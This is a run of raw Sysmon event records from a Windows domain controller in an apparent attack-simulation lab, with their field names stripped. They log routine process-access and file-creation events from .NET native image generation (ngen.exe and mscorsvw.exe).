13:46:22.125{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.125{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.796{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.796{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.531{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E801-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:23.359{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d30-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-18 13:46:23.359 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.125{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.125{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E701-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E601-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.781{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.781{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.453{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:24.437{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 